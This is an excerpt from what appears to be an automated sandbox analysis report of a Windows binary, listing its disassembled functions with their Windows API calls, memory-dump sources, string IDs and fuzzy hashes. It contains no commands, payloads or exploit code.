                                                            APIs
                                                            • _memset.LIBCMT ref: 006F2A22
                                                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006F2A41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: InfoItemMenu_memset
                                                            • String ID: 0
                                                            • API String ID: 2223754486-4108050209
                                                            • Opcode ID: 5d26c006013370fd58646daf7a46c1b34c44b825025eae9fe19b94753fa38eab
                                                            • Instruction ID: 09618357b408570f523c4e197214142d35f3ec92040e2ce5715542f4fe3f1fb8
                                                            • Opcode Fuzzy Hash: 5d26c006013370fd58646daf7a46c1b34c44b825025eae9fe19b94753fa38eab
                                                            • Instruction Fuzzy Hash: 9511D03291121EABCB30DA9CD865BFA77BAAB45300F048021EA55E7390D774AD0ACB95
                                                            APIs
                                                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0070222C
                                                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00702255
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Internet$OpenOption
                                                            • String ID: <local>
                                                            • API String ID: 942729171-4266983199
                                                            • Opcode ID: dc5e145151c65bc9b5395c75d9d79be064d0f9ba5f201e47d9ce902ad455af16
                                                            • Instruction ID: f291391c534d83e0bf717d37bc261486fce1b429fcacd20c1dbfe11fecd97fcb
                                                            • Opcode Fuzzy Hash: dc5e145151c65bc9b5395c75d9d79be064d0f9ba5f201e47d9ce902ad455af16
                                                            • Instruction Fuzzy Hash: DF11E072541225FADB248F91CC89EFBFBE8FF16751F10832AFA0486081D2785896D6F0
                                                            APIs
                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C14,007552F8,?,?,?), ref: 006A096E
                                                              • Part of subcall function 00697BCC: _memmove.LIBCMT ref: 00697C06
                                                            • _wcscat.LIBCMT ref: 006D4CB7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FullNamePath_memmove_wcscat
                                                            • String ID: R
                                                            • API String ID: 257928180-2121812343
                                                            • Opcode ID: f36ab44981d5c0afb02533e261094b75473bc04a842cdb119db5e71fa89e7c9c
                                                            • Instruction ID: 0f4589e4c45fe15c6f4d73598f46d7a21df07b23407af7ff1265849efa7cbd60
                                                            • Opcode Fuzzy Hash: f36ab44981d5c0afb02533e261094b75473bc04a842cdb119db5e71fa89e7c9c
                                                            • Instruction Fuzzy Hash: 0711A9309052099B9F80FB64C815EDE73FAEF09351B0054A9F948D7285DAB4AB844B15
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC
                                                            • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 006E8E73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: f9fa1643639c7a6332e32adb039eeb36fa51e0bd4dd1972f372489c84dae7b19
                                                            • Instruction ID: 43e376c7ff0ab62cbe3dc24fbca1aa9863fb917ac57ca20ab08307b36e1662b1
                                                            • Opcode Fuzzy Hash: f9fa1643639c7a6332e32adb039eeb36fa51e0bd4dd1972f372489c84dae7b19
                                                            • Instruction Fuzzy Hash: A201F1B1602358AB9F15EBA5CC469FE736EAF05320B040A1DF826672E1DF355808C650
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: __fread_nolock_memmove
                                                            • String ID: EA06
                                                            • API String ID: 1988441806-3962188686
                                                            • Opcode ID: 1414a157acc64d14254ba96f56834a0c6067ecf76422ea45afc50a9b3c60946d
                                                            • Instruction ID: 52ecf6fd7a01377e2321c29389126c4786b868dac757dd2fae79566fb81ee2ec
                                                            • Opcode Fuzzy Hash: 1414a157acc64d14254ba96f56834a0c6067ecf76422ea45afc50a9b3c60946d
                                                            • Instruction Fuzzy Hash: F20196B29042187EDB68CAA88856EFE7BF89F15311F00459EE552D2181E975E6048760
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC
                                                            • SendMessageW.USER32(?,00000180,00000000,?), ref: 006E8D6B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 262cdaece8b267518722becc46c5eea29387c251fb05977856644759702dc44c
                                                            • Instruction ID: 9af2d59cf1025c444fc53d2994cd794ad9a84597d0921a3a4db9e38553da7381
                                                            • Opcode Fuzzy Hash: 262cdaece8b267518722becc46c5eea29387c251fb05977856644759702dc44c
                                                            • Instruction Fuzzy Hash: 6201D4B1A42208ABDF15EBE1CD56AFE73AE9F15300F100029B806632D1DE155E08D275
                                                            APIs
                                                              • Part of subcall function 00697DE1: _memmove.LIBCMT ref: 00697E22
                                                              • Part of subcall function 006EAA99: GetClassNameW.USER32(?,?,000000FF), ref: 006EAABC
                                                            • SendMessageW.USER32(?,00000182,?,00000000), ref: 006E8DEE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClassMessageNameSend_memmove
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 372448540-1403004172
                                                            • Opcode ID: 0e705ab8167dc496ef407df1b002aaaf7fe411678bda6bbcab033558ac48f9e8
                                                            • Instruction ID: d0a29b38fbbbc71113e14fe072f6ca462c58f06dd449a4c562072d33d5da1e81
                                                            • Opcode Fuzzy Hash: 0e705ab8167dc496ef407df1b002aaaf7fe411678bda6bbcab033558ac48f9e8
                                                            • Instruction Fuzzy Hash: B301F7B1A42248ABDF15E6A5CD42AFE73AE8F15300F104019F806A32D1DE155E08D275
                                                            APIs
                                                            • VariantInit.OLEAUT32(?), ref: 006EC534
                                                              • Part of subcall function 006EC816: _memmove.LIBCMT ref: 006EC860
                                                              • Part of subcall function 006EC816: VariantInit.OLEAUT32(00000000), ref: 006EC882
                                                              • Part of subcall function 006EC816: VariantCopy.OLEAUT32(00000000,?), ref: 006EC88C
                                                            • VariantClear.OLEAUT32(?), ref: 006EC556
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Variant$Init$ClearCopy_memmove
                                                            • String ID: d}t
                                                            • API String ID: 2932060187-2103838832
                                                            • Opcode ID: af5fbf8599f2c744cac2209cee57390f080991a6a251f41d13e780452e3bd98e
                                                            • Instruction ID: 8e778d0d777d3b541acdf5aebe187301811005ca9d6249e27f2748a2e641273a
                                                            • Opcode Fuzzy Hash: af5fbf8599f2c744cac2209cee57390f080991a6a251f41d13e780452e3bd98e
                                                            • Instruction Fuzzy Hash: 011100719007089FCB10DF9AD88489AF7F8FF08310B50862EE58AD7651E771AA45CF94
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp
                                                            • String ID: #32770
                                                            • API String ID: 2292705959-463685578
                                                            • Opcode ID: 3f340aac350ecc35a93d7959622ab032bca567c448c514b5726b6d41a78e6510
                                                            • Instruction ID: d7cefe37e6e70902bfb6e3f8e39c7739ee6d11930e4908f495e64ada02c07068
                                                            • Opcode Fuzzy Hash: 3f340aac350ecc35a93d7959622ab032bca567c448c514b5726b6d41a78e6510
                                                            • Instruction Fuzzy Hash: 55E0227260022C2AD320AA99AC09BE7F7ACEB81B20F00002AFD04D3180EA609A5187E4
                                                            APIs
                                                              • Part of subcall function 006CB314: _memset.LIBCMT ref: 006CB321
                                                              • Part of subcall function 006B0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006CB2F0,?,?,?,0069100A), ref: 006B0945
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0069100A), ref: 006CB2F4
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0069100A), ref: 006CB303
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006CB2FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 3158253471-631824599
                                                            • Opcode ID: c813ccdb4eccc7efcf79fea5dbd59714df43f1f0ccbff1c6e29b33679fe1d10e
                                                            • Instruction ID: 4f0d2c2adba88511a4efab4770b44735299bbbf57716d5cfddb9c8a47b07a730
                                                            • Opcode Fuzzy Hash: c813ccdb4eccc7efcf79fea5dbd59714df43f1f0ccbff1c6e29b33679fe1d10e
                                                            • Instruction Fuzzy Hash: 31E06DB02007808FE760EF28E4097967AE8FF00304F04CA6CE45AC7642EBB8E444CBA1
                                                            APIs
                                                            • GetSystemDirectoryW.KERNEL32(?), ref: 006D1775
                                                              • Part of subcall function 0070BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,006D195E,?), ref: 0070BFFE
                                                              • Part of subcall function 0070BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0070C010
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 006D196D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                            • String ID: WIN_XPe
                                                            • API String ID: 582185067-3257408948
                                                            • Opcode ID: c2cb29e2c03458fb8b8cc8bb820a3e1acf30675bc446dd0e17f2cfdcdff3bb94
                                                            • Instruction ID: 1f9eae8d15fe540949d132d27c39cf46d92e9149ab67d2a6246cbfffbedfec66
                                                            • Opcode Fuzzy Hash: c2cb29e2c03458fb8b8cc8bb820a3e1acf30675bc446dd0e17f2cfdcdff3bb94
                                                            • Instruction Fuzzy Hash: 89F0C970C04109EFDB15DB95C988AECBBF9BB09301F544096E102A72A1D7B55F85DF64
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0071596E
                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00715981
                                                              • Part of subcall function 006F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: da5847e0ea525442600f47ed305010fefcbe6e6cad774b33452a7c898370e523
                                                            • Instruction ID: 1c0cdf975f776e0b640778eeb9d582b7747b12b506403f0c99a017a827248e3d
                                                            • Opcode Fuzzy Hash: da5847e0ea525442600f47ed305010fefcbe6e6cad774b33452a7c898370e523
                                                            • Instruction Fuzzy Hash: 6ED01231784715BBE7A4BB749C0FFE7AA15BF00B50F008839F34EAA1D1C9E89810C658
                                                            APIs
                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007159AE
                                                            • PostMessageW.USER32(00000000), ref: 007159B5
                                                              • Part of subcall function 006F5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006F52BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                            • Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd
                                                            Similarity
                                                            • API ID: FindMessagePostSleepWindow
                                                            • String ID: Shell_TrayWnd
                                                            • API String ID: 529655941-2988720461
                                                            • Opcode ID: 4d9dbe2683a19f432b9e6469e76a1b4adcf7434a2781b8962ba0df4a820b1b81
                                                            • Instruction ID: a69a987a50df52c842f9a5fd51c4d68a5a984f2c3c2ff23e84a7ea0e5f424e5f
                                                            • Opcode Fuzzy Hash: 4d9dbe2683a19f432b9e6469e76a1b4adcf7434a2781b8962ba0df4a820b1b81
                                                            • Instruction Fuzzy Hash: 61D0C9317807157AE6A4AB749C0BFD6A615BB04B50F008829F34AAA1D1C9E8A810C658